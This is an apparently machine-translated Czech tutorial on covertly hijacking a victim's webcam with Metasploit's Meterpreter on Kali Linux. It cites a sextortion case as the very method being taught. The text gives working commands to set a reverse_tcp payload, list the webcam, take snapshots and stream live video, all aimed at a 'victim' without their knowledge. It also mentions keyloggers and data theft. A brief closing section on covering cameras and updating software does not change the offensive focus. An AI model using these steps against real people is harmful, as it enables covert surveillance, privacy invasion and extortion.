V tomto tutoriálu, budeme se podívat na to, jak můžeme proniknout do kamery tajně a na dálku přes internet a podívat se na to, co se děje na druhé straně. Použijeme výkonný Meterpreter a Kali Linux, abychom se nabourali do webové kamery oběti. Vezmeme plnou kontrolu nad webovou kameru, zapněte ji, si snímky a dokonce streamovat živé video, aniž někdo někdy zjistil.
začátkem roku 2014 byl hacker odsouzen na 18 měsíců za to, že to udělal Miss Teen USA 2013. V jejím počítači našel zranitelnost (jako nějaký zastaralý software), pořídil několik kompromitujících fotografií z webové kamery a vydíral oběť, aby poslala další fotografie. Metoda, kterou použil, je přesně to, co budeme zkoušet tady.
náš nejlepší přítel meterpreter
nám pomůže s tímto hackem. S Meterpreter můžeme ovládat něčí webovou kameru, nainstalovat keylogger nebo zasadit vlastní viry, ukrást soukromá data a dělat v počítači oběti téměř cokoli.
v tomto tutoriálu předpokládám, že jste již použili modul útoku k zneužití chyby zabezpečení pomocí Metasploit(jak to udělat ?). Teď se k tomu dostaneme.
Jak hack webkamery?
Krok 1: Nastavení meterpreteru.
po úspěšném využití oběti máme nyní možnost nastavit užitečné zatížení podle našeho výběru. Užitečné zatížení řekne metasploitu, co dělat v počítači oběti, jakmile se vloupá. Meterpreter je naše užitečné zatížení. Následující příkaz nastaví naše užitečné zatížení:
set payload windows/meterpreter/reverse_tcp
Pokud byl útok úspěšný, metasploit automaticky nainstaluje meterpreter do cílového systému a můžeme přejít k hackování webové kamery.
Krok 2: Najděte webovou kameru.
Meterpreter má vestavěný modul pro vyhledávání a ovládání webové kamery vzdáleného systému. Můžeme začít hledáním, zda má systém dokonce webovou kameru nebo not.me. níže uvedený příkaz se používá k tomu, že nám také vrátí název webové kamery.
meterpreter > webcam_list
a nyní byste měli vidět webovou kameru vašeho cíle uvedenou ve výstupu.
Krok 3: pořizovat snímky
Pokud poslední příkaz nám dal webcam můžeme jít dopředu a snap fotografii:
meterpreter > webcam_snap
A nyní byste měli vidět obraz byl uložen ve složce /opt/framework3/msf3
Jednoduše přes hlavu.
Krok 4: přenos v reálném čase videa z hacknutý webové kamery
Tak jsme se jen vyfotili, pojďme se podívat, jak se dostat živé video stream. Můžeme to udělat zadáním příkazu níže: (Jsme pomocí –p
parametr určuje adresář, který chceme dát na streamované video souboru)
meterpreter > run webcam -p /var/www
Tento příkaz spustí webové kamery oběti a posílá svůj video výstup do /var/www/webcam.htm
. Můžete otevřít tento soubor a podívejte se, co se děje na druhém konci v živém video streamu.
jak zabránit hacknutí vlastní webové kamery?
existuje několik způsobů, jak proniknout do webkamery. Ve výše uvedeném příkladu můžeme pomocí několika malých příkazů nahlédnout do webové kamery naší oběti. Každý zkušený bezpečnostní expert vám řekne, že žádný systém není zcela bezpečný. To je důvod, proč byste měli mít vždy kamery zakryté, když se nepoužívají. Osobně používám tento malý gadget na svém notebooku i smartphonu.
ale to neznamená, že byste se neměli obtěžovat aktualizováním operačního systému a aplikací, právě naopak. Pokud hacker může získat kontrolu nad vaší webovou kamerou, váš systém byl úspěšně využit,je to nyní skutečně bot, otrok útočníka. To znamená, že útočník může ve vašem systému dělat cokoli: přistupovat k vašim soukromým datům, vidět vše, co píšete, stejně jako všechny navštívené webové stránky.
jaké zařízení právě používáte? Smartphone? Notebook? Je pravděpodobné, že zíráte přímo na kameru. Cítíte se najednou trochu nesvůj? Měl bys. Neriskuj. Pokud jste jednoduše zakrýt své kamery a pravidelně aktualizovat všechny vaše software, můžete se vyhnout bytí obětí webcam hack sebe.